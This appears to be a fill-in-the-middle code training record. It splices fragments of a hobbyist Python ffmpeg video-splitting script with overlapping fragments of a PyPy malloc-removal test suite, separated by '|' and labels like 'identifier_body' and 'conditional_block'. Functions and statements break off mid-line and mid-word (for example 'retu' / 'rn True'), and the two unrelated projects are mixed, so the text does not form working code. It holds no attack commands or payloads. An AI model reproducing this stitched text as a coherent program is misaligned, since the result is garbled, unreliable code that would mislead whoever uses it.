RunFFMpeg(out_video.full_path, ' '.join(ffmpeg_command))
if verbose:
print("Created Output Video")
if out_video.time:
ReplaceDateModified(out_video.full_path, out_video.time.timestamp())
if verbose:
print("Changed Date Modified")
os.remove(temp_file)
def RunFFMpegSubVideo( time_range_number, input_video, temp_video, use_filter_complex_default ):
dt_start, dt_end, dt_diff = input_video.GetTimeRange( time_range_number )
time_start = str(dt_start)
time_end = str(dt_end)
time_diff = str(dt_diff)
video_len = GetVideoLength(input_video.abspath)
if video_len < dt_start:
raise Exception( "start time bad" )
ffmpeg_command = [
ffmpeg_bin + "ffmpeg",
"-y -hide_banner",
"-ss " + time_start,
'-i "' + input_video.abspath + '"',
"-map 0:v"
]
# get audio track count
audio_tracks = GetAudioTrackCount(input_video.abspath)
if final_encode:
ffmpeg_command.append("-c:v libx265")
ffmpeg_command.append("-crf 8")
ffmpeg_command.append("-preset slow")
else:
ffmpeg_command.append("-c:v libx264")
ffmpeg_command.append("-crf 24")
ffmpeg_command.append("-preset ultrafast")
# TODO: make sure the output colors are not messed up with this
# shadowplay color range: Limited
# shadowplay color primaries: BT.601 NTSC
# shadowplay color space: YUV
# shadowplay standard: PAL
# what does this do?
# "-h full"
# this stretches the color range i think, so it looks
|
CreateDirectory
|
identifier_name
|
ffmpeg_video_splitter.py
|
def FindCommand( arg, short_arg ):
found = FindItemInList(sys.argv, arg, False)
if not found:
found = FindItemInList(sys.argv, short_arg, False)
return found
def FindCommandValue( arg, short_arg ):
value = FindItemInList(sys.argv, arg, True)
if not value:
value = FindItemInList(sys.argv, short_arg, True)
return value
# ok, what the fuck am i doing with all these paths?
class VideoFile:
def __init__(self, filename, root_folder, config_folder, output_folder, force_file_ext):
self.output_folder = output_folder
self.raw_path = os.path.normpath(filename)
self.path = os.path.normpath(output_folder + os.sep + filename)
if force_file_ext:
prefix = os.path.splitext(self.path)[0]
if "." not in force_file_ext:
force_file_ext = "." + force_file_ext
self.path = os.path.normpath( prefix + force_file_ext )
if os.sep in self.path:
self.filename = self.path.rsplit( os.sep, 1 )[1]
else:
self.filename = self.path
if os.path.isabs( output_folder ):
self.full_path = self.path
else:
self.full_path = os.path.normpath( config_folder + self.path )
self.full_output_path = self.full_path.rsplit( os.sep, 1 )[0] + os.sep
self.root_config_folder = config_folder
self.root_video_folder = root_folder
self.input_videos = []
self.time = None
self.global_ffmpeg_cmd = []
self.global_filter_complex = []
self.skip = False # this will be set to true if the crc check fails
self.crc_list = []
# dumb temp thing that will be here for 40 years
self.use_filter_complex_default = True
def AddInputVideo(self, input_video_filename, check=True):
if os.path.isabs( input_video_filename ):
full_input_video_path = input_video_filename
else:
full_input_video_path = os.path.normpath(self.root_video_folder + input_video_filename)
if check:
for input_video_obj in self.input_videos:
if full_input_video_path == input_video_obj.abspath:
return
input_video = InputVideoFile( input_video_filename, self.root_video_folder, self.root_config_folder )
input_video.ffmpeg_cmd_line.extend(self.global_ffmpeg_cmd)
input_video.filter_complex_list.extend(self.global_filter_complex)
self.input_videos.append( input_video )
def AddTimeRange(self, start, end):
# maybe i should use a filename and get the index instead? idk
input_video = self.input_videos[-1]
input_video.AddTimeRange(start, end)
def AddFFMpegCommand(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.input_videos[-1].ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.input_videos[-1].filter_complex_list.append(filter_complex_option)
class InputVideoFile:
def __init__(self, filename, root_folder, config_folder):
if os.path.isabs(filename):
self.abspath = os.path.normpath( filename )
else:
self.abspath = os.path.normpath( root_folder + filename )
self.filename = os.path.basename(self.abspath)
# bad idea?
if os.path.isabs(filename):
self.raw_path = os.path.normpath(filename)
else:
append_folder = ''.join( root_folder.split( config_folder, 1 ) )
self.raw_path = os.path.normpath(append_folder + filename)
self.time_ranges = []
self.ffmpeg_cmd_line = []
self.filter_complex_list = []
def AddTimeRange(self, start, end):
self.time_ranges.append([ConvertTimestampToTimeDelta(start), ConvertTimestampToTimeDelta(end)])
def GetTimeRange(self, list_index):
dt_start = self.time_ranges[list_index][0]
dt_end = self.time_ranges[list_index][1]
dt_diff = GetTimeDiff(dt_start, dt_end)
return dt_start, dt_end, dt_diff
def AddFFMpegCommand(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.filter_complex_list.append(filter_complex_option)
def GetTimeDiff(dt_start, dt_end):
time_difference = dt_end.total_seconds() - dt_start.total_seconds()
if time_difference <= 0:
raise Exception("Time difference less than 0: " + str(time_difference))
return datetime.timedelta(seconds=time_difference)
def ConvertTimestampToTimeDelta(timestamp_str):
time_split = timestamp_str.split(":")
time_split.reverse()
total_seconds = float(time_split[0])
for index in range(1, len(time_split)):
total_seconds += int(time_split[index]) * (60 ** index)
time_dt = datetime.timedelta(seconds=total_seconds)
return time_dt
def ConvertToDateTime(datetime_str):
date, time = datetime_str.split(" ", 1)
year, month, day = date.split('-')
hour, minute, second = time.split('-')
date_time = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))
return date_time
def CreateDirectory(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def RemoveDirectory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
def DeleteFile( path ):
try:
os.remove(path)
except FileNotFoundError:
pass
def ParseConfig( config_blocks, base_output_folder, config_folder ):
if verbose:
print( "Parsing Config" )
full_root_folder = config_folder
full_output_folder = base_output_folder
force_file_ext = False
time_stamp = None
video_list = []
for block_obj in config_blocks:
if block_obj.key == "$base_output_folder" or block_obj.key == "$output_folder":
base_output_folder = os.path.normpath( block_obj.value ) + os.sep
full_output_folder = base_output_folder
elif block_obj.key == "$append_output_folder":
if os.path.isabs( block_obj.value ):
full_output_folder = os.path.normpath( block_obj.value )
else:
full_output_folder = os.path.normpath( base_output_folder + block_obj.value )
elif block_obj.key == "$force_file_ext":
force_file_ext = block_obj.value
elif block_obj.key == "$include":
include_config = lexer.ReadFile(block_obj.value)
config_path = os.path.join(full_root_folder, os.path.split(block_obj.value)[0])
include_video_list, base_output_folder = ParseConfig(include_config, base_output_folder, config_path)
video_list.extend(include_video_list)
elif block_obj.key in {"$input_video_folder", "$input_folder"}:
if os.path.isabs( block_obj.value ):
full_root_folder = os.path.normpath( block_obj.value ) + os.sep
else:
full_root_folder = os.path.normpath( config_folder + block_obj.value ) + os.sep
# is a video file
else:
video_file = VideoFile( block_obj.key, full_root_folder, config_folder,
full_output_folder, force_file_ext )
if block_obj.items:
AddInputVideosToVideo( video_file, block_obj )
video_list.append(video_file)
video_file.crc_list.append(GetCRC(base_output_folder))
video_file.crc_list.append(GetCRC(str(final_encode)))
if not os.path.isfile(video_file.full_path):
continue
elif not CheckCRC(video_file, video_file.crc_list):
video_file.skip = True
return video_list, base_output_folder
def AddInputVideosToVideo( video_file, block_obj ):
for input_video_block in block_obj.items:
crc_list = []
input_video_block.key = os.path.normpath( input_video_block.key )
if input_video_block.key == "$time":
# TODO: maybe if the value is 'self', use the input video date modified?
# you might not be able to get a date modified due to no input videos being added, oof
# and what if there is more than one video?
time_stamp = ConvertToDateTime(input_video_block.value)
video_file.time = time_stamp
elif input_video_block.key == "$ffmpeg_cmd":
video_file.global_ffmpeg_cmd.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif input_video_block.key == "$no_filter_complex_default":
video_file.use_filter_complex_default = False
elif input_video_block.key == "$filter_complex":
video_file.global_filter_complex.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif ":" in input_video_block.key and not os.sep in input_video_block.key:
video_file.AddInputVideo( video_file.raw_path )
crc_list.append( GetCRC(video_file.raw_path) )
crc_list = AddInputVideoSetting( video_file, input_video_block, crc_list )
else:
video_file.AddInputVideo(input_video_block.key,
|
if item in search_list:
if return_value:
return search_list[search_list.index(item) + 1]
else:
return True
else:
return False
|
identifier_body
|
|
ffmpeg_video_splitter.py
|
8")
ffmpeg_command.append("-preset slow")
else:
ffmpeg_command.append("-c:v libx264")
ffmpeg_command.append("-crf 24")
ffmpeg_command.append("-preset ultrafast")
# TODO: make sure the output colors are not messed up with this
# shadowplay color range: Limited
# shadowplay color primaries: BT.601 NTSC
# shadowplay color space: YUV
# shadowplay standard: PAL
# what does this do?
# "-h full"
# this stretches the color range i think, so it looks like fucking shit with limited color range
# ffmpeg_command.append("-vf scale=in_range=limited:out_range=full")
# ffmpeg_command.append("-vf colormatrix bt709")
# Filter complex stuff here:
filter_complex = []
# this is really just a hardcoded hack since this is what i use it for lmao
if use_filter_complex_default:
if audio_tracks == 5 or audio_tracks == 4:
filter_complex.append("[0:a:1][0:a:2]amerge[audio_combine]")
elif audio_tracks == 2:
filter_complex.append("[0:a:0][0:a:1]amerge[audio_combine]")
else:
ffmpeg_command.append("-map 0:a")
else:
ffmpeg_command.append("-map 0:a")
filter_complex += input_video.filter_complex_list
if filter_complex:
ffmpeg_command.append( '-filter_complex "' + ';'.join(filter_complex) + '"' )
if use_filter_complex_default and (audio_tracks == 5 or audio_tracks == 4 or audio_tracks == 2):
ffmpeg_command.append( "-map \"[audio_combine]\"" )
# TODO: maybe move these hard coded colorspace things to maybe a color command in the config?
# $colors "full" / "limited"
if audio_tracks == 5:
ffmpeg_command.append("-pix_fmt yuvj420p")
elif audio_tracks == 4 or audio_tracks == 2:
# Shadowplay - PAL - bad colors:
ffmpeg_command.append("-colorspace bt470bg -color_primaries bt470bg -color_trc gamma28")
# NTSC - OBS?:
# ffmpeg_command.append("-colorspace smpte170m -color_primaries smpte170m -color_trc smpte170m")
# TODO: test this on newer clips with full color range
# i do notice very minor color changes with this from limited to full
# doesn't do anything?
# ffmpeg_command.append("-pix_fmt yuvj420p")
# ffmpeg_command.append("-pix_fmt yuv420p")
ffmpeg_command.append("-c:a libvorbis")
# This is a bug in ffmpeg, so im using libvorbis for now until this is fixed
# ffmpeg_command.append("-c:a libopus")
ffmpeg_command.append("-b:a 192k")
ffmpeg_command.append("-t " + time_diff)
# any custom commands
ffmpeg_command.extend( input_video.ffmpeg_cmd_line )
# output file
ffmpeg_command.append('"' + temp_video + '"')
total_frames = GetTotalFrameCount( dt_diff, GetFrameRate(input_video.abspath) )
if verbose:
print("Start: " + time_start + " - End: " + time_end)
print("Total Frames: " + str(total_frames))
RunFFMpeg(temp_video, ' '.join(ffmpeg_command), total_frames)
return
def GetFrameRate( video_path ):
command = (
ffmpeg_bin + "ffprobe",
"-v 0",
"-of csv=p=0",
"-select_streams v:0",
"-show_entries stream=r_frame_rate",
'"' + video_path + '"'
)
output = subprocess.check_output(' '.join(command), shell=True)
output = str(output).replace("\\r", "").replace("\\n", "").replace("\'", "")[1:]
numerator, denominator = output.split( "/" )
frame_rate = int(numerator) / int(denominator)
return frame_rate
def GetTotalFrameCount( dt_time_length, frame_rate ):
return dt_time_length.total_seconds() * frame_rate
def RunFFMpeg( out_file, cmd, total_frames=None ):
if raw_ffmpeg:
subprocess.run( cmd )
if not os.path.isfile(out_file) or os.path.getsize(out_file) == 0:
raise Exception("ffmpeg died")
else:
ffmpeg_run = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if total_frames:
UpdateProgressBar( 0.00, 52 ) # start it at 0
ffmpeg_output = ''
for line in ffmpeg_run.stdout:
ffmpeg_output += line
if total_frames:
if "frame=" in line:
# use the total time range and divide it by ffmpeg's current time in the encode to get a percentage
current_frame = line.split("frame= ")[1].split(" fps=")[0]
percentage = GetPercent( int(current_frame), total_frames, 2 )
UpdateProgressBar( percentage, 52 )
# TODO: IDEA: replace the progress bar with "\n" once it's done?
if total_frames:
UpdateProgressBar(100.0, 52) # usually it finishes before we can catch the last frame
if not os.path.isfile(out_file) or os.path.getsize(out_file) == 0:
print()
raise Exception("ffmpeg died - output:\n\n" + ffmpeg_output)
def GetPercent( current_frame, total_frames, round_num ):
return round(( current_frame / total_frames ) * 100, round_num)
def UpdateProgressBar( percentage, width ):
block = int(round(width * (percentage / 100)))
text = "\r{0} {1}%".format( "█" * block + "░"*( width - block ), percentage )
sys.stdout.write( text )
sys.stdout.flush()
def GetAudioTrackCount( video ):
ffprobe_command = (
ffmpeg_bin + "ffprobe",
"-loglevel error",
"-show_entries stream=codec_type",
"-of csv=p=0",
'"' + video + '"',
)
output = subprocess.check_output( ' '.join( ffprobe_command ), shell=True )
# now clean up that output and shove it into a list
stream_list = str( output ).split( "\\n" )
audio_tracks = 0
for stream in stream_list:
if "audio" in stream:
audio_tracks += 1
return audio_tracks
def GetVideoLength(video):
ffprobe_command = ffmpeg_bin + \
"ffprobe -threads 6 -v error -show_entries format=duration " \
"-of default=noprint_wrappers=1:nokey=1 \"" + video + '"'
output = subprocess.check_output(ffprobe_command, shell=True)
# clean up the output
str_video_length = str(output).split("\\n")[0].split("\\r")[0].split("b\'")[1]
if str_video_length == "N/A":
return None
return ConvertTimestampToTimeDelta(str_video_length)
def StartEncodingVideos( video_list ):
temp_folder = "TEMP" + os.sep + str(datetime.datetime.now()) + os.sep
temp_folder = temp_folder.replace(":", "-").replace(".", "-")
temp_path = root_folder + temp_folder
CreateDirectory(temp_path)
for output_video in video_list:
if output_video.skip:
continue
print(output_video.path)
temp_video_list = []
temp_video_num = 0
for input_video in output_video.input_videos:
print("\nInput: " + input_video.filename)
time_range_number = 0
while time_range_number < len(input_video.time_ranges):
temp_video = temp_path + str(temp_video_num) + ".mkv"
temp_video_list.append( temp_video )
RunFFMpegSubVideo(time_range_number, input_video, temp_video, output_video.use_filter_complex_default)
time_range_number += 1
temp_video_num += 1
if time_range_number < len(input_video.time_ranges):
print()
print()
CreateDirectory( output_video.full_output_path )
# now combine all the sub videos together
RunFFMpegConCat(temp_path, temp_video_list, output_video)
print()
MakeCRCFile(output_video.filename, output_video.crc_list)
print("-----------------------------------------------------------")
RemoveDirectory(temp_path) # TODO: has an issue on linux
return
def CheckCRC( video_obj, crc_list ):
if verbose:
print( "Checking Hash: " + video_obj.filename + ".crc" )
video_crc_path = os.path.join( root_folder, "crcs", video_obj.filename + ".crc" )
if os.path.isfile(video_crc_path):
with open(video_crc_path, mode="r", encoding="utf-8") as file:
crc_file = file.read().splitlines()
valid_crcs = []
for video_crc in crc_file:
if video_crc not in crc_list:
# print("Invalid Hash: " + video_obj.filename + ".crc")
retu
|
rn True
|
conditional_block
|
|
test_malloc.py
|
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
t = x-y, x+y
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
pass
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def
|
(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
self.addr = llmemory.raw_malloc(SIZE)
def __del__(self):
llmemory.raw_free(self.addr)
class B:
pass
def myfunc():
b = B()
b.keep = A()
b.data = llmemory.cast_adr_to_ptr(b.keep.addr, PARRAY)
b.data[0] = 42
ptr = b.data
# normally 'b' could go away as early as here, which would free
# the memory held by the instance of A in b.keep...
res = ptr[0]
# ...so we explicitly keep 'b' alive until here
objectmodel.keepalive_until_here(b)
return res
graph = self.check(myfunc, [], [], 42,
must_be_removed=False) #
|
test_direct_fieldptr_2
|
identifier_name
|
test_malloc.py
|
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
t = x-y, x+y
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
|
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def test_direct_fieldptr_2(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
return px[0] + s.y + pz[0]
self.check(fn, [], [], 42)
def test_getarraysubstruct(self):
py.test.skip("fails because of the interior structure changes")
U = lltype.Struct('U', ('n', lltype.Signed))
for length in [1, 2]:
S = lltype.GcStruct('S', ('a', lltype.FixedSizeArray(U, length)))
for index in range(length):
def fn():
s = lltype.malloc(S)
s.a[index].n = 12
return s.a[index].n
self.check(fn, [], [], 12)
def test_ptr_nonzero(self):
S = lltype.GcStruct('S')
def fn():
s = lltype.malloc(S)
return bool(s)
self.check(fn, [], [], True)
def test_substruct_not_accessed(self):
SMALL = lltype.Struct('SMALL', ('x', lltype.Signed))
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def fn():
x = lltype.malloc(BIG)
while x.z < 10: # makes several blocks
x.z += 3
return x.z
self.check(fn, [], [], 12)
def test_union(self):
py.test.skip("fails because of the interior structure changes")
UNION = lltype.Struct('UNION', ('a', lltype.Signed), ('b', lltype.Signed),
hints = {'union': True})
BIG = lltype.GcStruct('BIG', ('u1', UNION), ('u2', UNION))
def fn():
x = lltype.malloc(BIG)
x.u1.a = 3
x.u2.b = 6
return x.u1.b * x.u2.a
self.check(fn, [], [], Ellipsis)
def test_keep_all_keepalives(self):
SIZE = llmemory.sizeof(lltype.Signed)
PARRAY = lltype.Ptr(lltype.FixedSizeArray(lltype.Signed, 1))
class A:
def __init__(self):
self.addr = llmemory.raw_malloc(SIZE)
def __del__(self):
llmemory.raw_free(self.addr)
class B:
pass
def myfunc():
b = B()
b.keep = A()
b.data = llmemory.cast_adr_to_ptr(b.keep.addr, PARRAY)
b.data[0] = 42
ptr = b.data
# normally 'b' could go away as early as here, which would free
# the memory held by the instance of A in b.keep...
res = ptr[0]
# ...so we explicitly keep 'b' alive until here
objectmodel.keepalive_until_here(b)
return res
graph = self.check(myfunc, [], [], 42,
must_be_removed=False) # '
|
pass
|
identifier_body
|
test_malloc.py
|
from rpython.conftest import option
class TestMallocRemoval(object):
MallocRemover = LLTypeMallocRemover
def check_malloc_removed(cls, graph):
remover = cls.MallocRemover()
checkgraph(graph)
count1 = count2 = 0
for node in graph.iterblocks():
for op in node.operations:
if op.opname == cls.MallocRemover.MALLOC_OP:
S = op.args[0].value
if not remover.union_wrapper(S): # union wrappers are fine
count1 += 1
if op.opname in ('direct_call', 'indirect_call'):
count2 += 1
assert count1 == 0 # number of mallocs left
assert count2 == 0 # number of calls left
check_malloc_removed = classmethod(check_malloc_removed)
def check(self, fn, signature, args, expected_result, must_be_removed=True,
inline=None):
remover = self.MallocRemover()
t = TranslationContext()
t.buildannotator().build_types(fn, signature)
t.buildrtyper().specialize()
graph = graphof(t, fn)
if inline is not None:
from rpython.translator.backendopt.inline import auto_inline_graphs
auto_inline_graphs(t, t.graphs, inline)
if option.view:
t.view()
# to detect broken intermediate graphs,
# we do the loop ourselves instead of calling remove_simple_mallocs()
while True:
progress = remover.remove_mallocs_once(graph)
simplify.transform_dead_op_vars_in_blocks(list(graph.iterblocks()),
[graph])
if progress and option.view:
t.view()
if expected_result is not Ellipsis:
interp = LLInterpreter(t.rtyper)
res = interp.eval_graph(graph, args)
assert res == expected_result
if not progress:
break
if must_be_removed:
self.check_malloc_removed(graph)
return graph
def test_fn1(self):
def fn1(x, y):
if x > 0:
t = x+y, x-y
else:
t = x-y, x+y
s, d = t
return s*d
self.check(fn1, [int, int], [15, 10], 125)
def test_fn2(self):
class T:
pass
def fn2(x, y):
t = T()
t.x = x
t.y = y
if x > 0:
return t.x + t.y
else:
return t.x - t.y
self.check(fn2, [int, int], [-6, 7], -13)
def test_fn3(self):
def fn3(x):
a, ((b, c), d, e) = x+1, ((x+2, x+3), x+4, x+5)
return a+b+c+d+e
self.check(fn3, [int], [10], 65)
def test_fn4(self):
class A:
pass
class B(A):
pass
def fn4(i):
a = A()
b = B()
a.b = b
b.i = i
return a.b.i
self.check(fn4, [int], [42], 42)
def test_fn5(self):
class A:
attr = 666
class B(A):
attr = 42
def fn5():
b = B()
return b.attr
self.check(fn5, [], [], 42)
def test_aliasing(self):
class A:
pass
def fn6(n):
a1 = A()
a1.x = 5
a2 = A()
a2.x = 6
if n > 0:
a = a1
else:
a = a2
a.x = 12
return a1.x
self.check(fn6, [int], [1], 12, must_be_removed=False)
def test_bogus_cast_pointer(self):
class S:
pass
class T(S):
def f(self):
self.y += 1
def f(x):
T().y = 5
s = S()
s.x = 123
if x < 0:
s.f()
return s.x
graph = self.check(f, [int], [5], 123, inline=20)
found_operations = {}
for block in graph.iterblocks():
for op in block.operations:
found_operations[op.opname] = True
assert 'debug_fatalerror' in found_operations
def test_dont_remove_with__del__(self):
import os
delcalls = [0]
class A(object):
nextid = 0
def __init__(self):
self.id = self.nextid
self.nextid += 1
def __del__(self):
delcalls[0] += 1
#os.write(1, "__del__\n")
def f(x=int):
a = A()
i = 0
while i < x:
a = A()
os.write(1, str(delcalls[0]) + "\n")
i += 1
return 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
graph = graphof(t, f)
backend_optimizations(t)
op = graph.startblock.exits[0].target.exits[1].target.operations[0]
assert op.opname == "malloc"
def test_wrapper_cannot_be_removed(self):
SMALL = lltype.OpaqueType('SMALL')
BIG = lltype.GcStruct('BIG', ('z', lltype.Signed), ('s', SMALL))
def g(small):
return -1
def fn():
b = lltype.malloc(BIG)
g(b.s)
self.check(fn, [], [], None, must_be_removed=False)
def test_direct_fieldptr(self):
S = lltype.GcStruct('S', ('x', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 11
p = lltype.direct_fieldptr(s, 'x')
return p[0]
self.check(fn, [], [], 11)
def test_direct_fieldptr_2(self):
T = lltype.GcStruct('T', ('z', lltype.Signed))
S = lltype.GcStruct('S', ('t', T),
('x', lltype.Signed),
('y', lltype.Signed))
def fn():
s = lltype.malloc(S)
s.x = 10
s.t.z = 1
px = lltype.direct_fieldptr(s, 'x')
py = lltype.direct_fieldptr(s, 'y')
pz = lltype.direct_fieldptr(s.t, 'z')
py[0] = 31
